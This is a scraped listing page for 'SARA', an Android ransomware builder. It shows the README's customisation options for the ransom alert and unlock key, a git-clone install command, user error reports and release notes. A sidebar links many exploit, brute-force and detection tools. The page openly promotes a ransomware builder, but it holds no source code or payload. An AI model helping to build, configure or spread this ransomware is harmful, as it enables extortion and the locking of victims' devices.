SARA - Simple Android Ransomware Attack

Last update: Jan 04, 2023

Overview

SARA - Simple Android Ransomware Attack

Disclaimer

The author is not responsible for any issues or damage caused by this program.

Features

User can customize:

app_icon - custom icon application
app_name - custom name application
alert_title - custom alert title
alert_desc - custom alert description
key_pass - custom key for unlock devices

Installation

Tested on Ubuntu, I never try installing in other OS

git clone https://github.com/termuxhackers-id/SARA && cd SARA && sudo bash install.sh

Dependencies

Java
- Openjdk 11
Aapt
Apktool
- Apktool 2.4.0
Zipalign
Imagemagick
Python3
Python3-pip
- Pillow

Tools overview

For Termux you have to install Ubuntu Termux

Ransomware overview

Tested on devices Android 10

Output logs

Support Us

Facebook Pages @termuxhackers.id
Instagram @termuxhackers.id

Credit's

You might also like...

Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

🏆 Pancakeswap BSC Sniper Bot web3 with honeypot detector (ANDROID WINDOWS MAC LINUX) 🥇 ⭐️ ⭐️ ⭐️ First SNIPER BOT for ANDROID & WINDOWS with honeypot

12 Jan 7, 2023

Android Malware (Analysis | Scoring) System

An Obfuscation-Neglect Android Malware Scoring System Quark-Engine is also bundled with Kali Linux, BlackArch. A trust-worthy, practical tool that's r

1k Jan 4, 2023

This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

32 Nov 5, 2022

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

3 Sep 26, 2022

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

12 Dec 17, 2022

A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address.

Automator-Terminator A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers (PLCs) w

25 Oct 10, 2022

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

CVE-2021-36260 CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validatio

165 Dec 21, 2022

A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3

arp_spoof_detector A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3 Usage: git clone ht

1 Oct 30, 2021

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

17 Dec 11, 2022

Comments

Unable to run Sara

~/SARA $ python3 sara.py Traceback (most recent call last): File "/data/data/com.termux/files/home/SARA/sara.py", line 231, in check_requirements() File "/data/data/com.termux/files/home/SARA/sara.py", line 25, in check_requirements java_version=os.popen("java --version","r").read().splitlines()[0] IndexError: list index out of range

I tried to rerun it but it brought this out

opened by Codesam1 2
SET app icon

ERROR File not found please fill correctly !

SET APP_ICON (PNG: icon.png):

I've been stuck on this,i tried sdcard and internal storage, please help

opened by Viper55 1

Releases(v2.0)

v2.0(Sep 12, 2022)
Whats Changed ?

New ransomware type file encryption.

User can share their ransomware via the link

Update SARA repository size to 7,82 MiB

Ransomware already tested on Android 10

Support for termux non-root

Can u help me with click the forks and star on this repository? Thank you 🙂
Source code(tar.gz)
Source code(zip)

Owner

Termux Hackers

🎖️ Termux Enthusiast

GitHub Repository https://fb.me/termuxhackers.id

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Spring Cloud Gateway 3.0.7 & 3.1.1 Code Injection (RCE) CVE: CVE-2022-22947 CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)

35 Dec 28, 2022

Mr.Holmes is a information gathering tool (OSINT)

🔍 Mr.Holmes Mr.Holmes is a information gathering tool (OSINT). Is main purpose is to gain information about domains,username and phone numbers with t

534 Jan 08, 2023

edgedressing leverages a Windows "feature" in order to force a target's Edge browser to open. This browser is then directed to a URL of choice.

edgedressing One day while experimenting with airpwn-ng, I noticed unexpected GET requests on the target node. The node in question happened to be a W

43 Dec 23, 2022

Grafana-POC(CVE-2021-43798)

Grafana-Poc 此工具请勿用于违法用途。一、使用方法：python3 grafana_hole.py 在domain.txt中填入ip:port 二、漏洞影响范围影响版本： Grafana 8.0.0 - 8.3.0 安全版本： Grafana 8.3.1, 8.2.7, 8.1.8,

8 Jan 03, 2023

CVE-2021-44228 log4j 2.x rce漏洞检测工具

#1 使用说明 CVE-2021-44228 log4j 2.x rce漏洞检测工具，对目标链接发起get请求并利用dnslog探测是否有回显 $ python3 log4j-scan.py -h

4 Jan 13, 2022

Reusable Lightweight Pythonic Dependency Injection Library

Vacuna Inject everything! Vacuna is a little library to provide dependency management for your python code. Install pip install vacuna Usage import va

16 Sep 15, 2021

Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys triggered remotely.

CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc

220 Dec 14, 2022

This program will brute force any Instagram account you send it its way given a list of proxies.

Instagram Bruter This program will brute force any Instagram account you send it its way given a list of proxies. NOTICE I'm no longer maintaining thi

1 Nov 15, 2021

Tool To generate Stable Undetected Payload

windowsPayload Tool To generate Stable Undetected Payload Don t Upload to Virus Total :) Follow on Social Media Platforms ScreenShots How to install +

117 Dec 30, 2022

A honeypot for the Log4Shell vulnerability (CVE-2021-44228)

Log4Pot A honeypot for the Log4Shell vulnerability (CVE-2021-44228). License: GPLv3.0 Features Listen on various ports for Log4Shell exploitation. Det

79 Dec 27, 2022

A simple Log4Shell Scan with python

🐞 Log4Scan 🔧 Log4Shell 简单的主动和被动扫描脚本 Log4scan 针对header头和fuzz参数的主动批量扫描，用于大批量黑盒检测

6 Aug 04, 2022

Password database With special stuff

This is a Password database I made for myself, as I want to keep all my passwords in the same place. but still protected, shall anyone get access to the file. And so I made this simple password datab

9 Oct 30, 2022

Übersicht remote command execution 0day exploit

Übersicht RCE 0day Unauthenticated remote command execution 0day exploit for Übersicht. Description Übersicht is a desktop widget application for m

10 Dec 21, 2021

大宝剑-信息收集和资产梳理工具（红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配）

835 Jan 05, 2023

LeLeLe: A tool to simplify the application of Lattice attacks.

LeLeLe is a very simple library (300 lines) to help you more easily implement lattice attacks, the library is inspired by Z3Py (python interfa

4 Dec 14, 2021

CVE-2022-21907 Vulnerability PoC

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17, just some sm

16 Dec 18, 2022

MVT is a forensic tool to look for signs of infection in smartphone devices

Mobile Verification Toolkit Mobile Verification Toolkit (MVT) is a collection of utilities to simplify and automate the process of gathering forensic

8.3k Jan 08, 2023

Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

125 Dec 09, 2022

MassStringer, CTF Flag Finder

massStringer MassStringer, CTF Flag Finder Usage: python3 massStringer.py Enter absolute path of the directory to scan for flags Edit "flag = re.searc

4 Sep 06, 2022

DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

14 Nov 11, 2022

SARA - Simple Android Ransomware Attack

Related tags

Overview

Disclaimer

Features

Installation

Dependencies

Tools overview

Ransomware overview

Output logs

Support Us

Credit's

You might also like...

Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

Android Malware (Analysis | Scoring) System

This is an injection tool that can inject any xposed modules apk into the debug android app

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address.

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

Comments

Unable to run Sara

SET app icon

Releases(v2.0)

v2.0(Sep 12, 2022)

Whats Changed ?

Owner

Termux Hackers

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Mr.Holmes is a information gathering tool (OSINT)

edgedressing leverages a Windows "feature" in order to force a target's Edge browser to open. This browser is then directed to a URL of choice.

Grafana-POC(CVE-2021-43798)

CVE-2021-44228 log4j 2.x rce漏洞检测工具

Reusable Lightweight Pythonic Dependency Injection Library

Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys triggered remotely.

This program will brute force any Instagram account you send it its way given a list of proxies.

Tool To generate Stable Undetected Payload

A honeypot for the Log4Shell vulnerability (CVE-2021-44228)

A simple Log4Shell Scan with python

Password database With special stuff

Übersicht remote command execution 0day exploit

大宝剑-信息收集和资产梳理工具（红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配）

LeLeLe: A tool to simplify the application of Lattice attacks.

CVE-2022-21907 Vulnerability PoC

MVT is a forensic tool to look for signs of infection in smartphone devices

Northwave Log4j CVE-2021-44228 checker

MassStringer, CTF Flag Finder

DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE